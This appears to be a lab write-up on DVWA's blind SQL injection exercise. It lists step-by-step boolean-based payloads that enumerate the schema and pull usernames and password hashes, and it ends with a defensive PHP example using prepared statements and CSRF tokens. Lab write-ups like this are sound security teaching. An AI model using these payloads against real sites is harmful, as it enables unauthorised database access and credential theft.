low
Looking at the source code, error-based injection is not possible here, so only boolean-based and time-based injection remain.
Since the result is echoed back in the response, boolean-based injection is used directly.
```sql
1' and length(database())=4 #
1' and substr(database(),1,1)<'m' #   (narrow each character down by binary search)
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #
1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=9 #   (guess the number of characters in the table name)
1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)<'m' #
1' and (select count(column_name) from information_schema.columns where table_name='users')=2 #   (guess the number of columns)
1' and substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)<'m' #
1' and substr((select concat_ws(':',user_id,first_name,last_name,password) from dvwa.users limit 0,1),2,1)<'m' #   (a scalar subquery must return a single column, so the fields are concatenated)
```
medium
The interface is the same as sql-medium; capture a request and boolean-based and time-based injection can be carried out.
high
After reading the source, time-based injection is interfered with, so boolean-based injection is used; the approach is the same as low, and the source configuration is similar to sql-high.
impossible
Still the combination of PDO and an Anti-CSRF token to improve security.
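The protection the impossible level relies on, written out as an added PHP example (this is not DVWA's own source); the `$db` PDO handle, the `users` table layout and the session-based token are assumptions:

```php
<?php
// Added example, not DVWA's code: prepared statement + anti-CSRF token check.
// Assumes $db is an already-opened PDO connection and the session is started.
session_start();

function check_token(string $submitted): bool {
    // Constant-time comparison against the token stored in the session.
    return isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

function lookup_user(PDO $db, string $rawId): ?array {
    // Only a string of digits is accepted; a probe such as  1' and length(database())=4 #
    // is rejected here before any SQL is built.
    if (!ctype_digit($rawId)) {
        return null;
    }
    $id = (int) $rawId;
    // The id is bound as a parameter and never concatenated into the query text,
    // so substr()/length() conditions cannot alter the query's logic.
    $stmt = $db->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

if (isset($_POST['id'], $_POST['user_token'])) {
    if (!check_token($_POST['user_token'])) {
        http_response_code(403);
        exit('CSRF token is incorrect');
    }
    $row = lookup_user($db, $_POST['id']);
    echo $row
        ? htmlspecialchars($row['first_name'] . ' ' . $row['last_name'], ENT_QUOTES, 'UTF-8')
        : 'User ID is MISSING from the database.';
}

// Issue a fresh token for the next request so a captured one cannot be replayed.
$_SESSION['csrf_token'] = bin2hex(random_bytes(32));
```

The token has to be embedded in the form as the hidden `user_token` field for the check to pass.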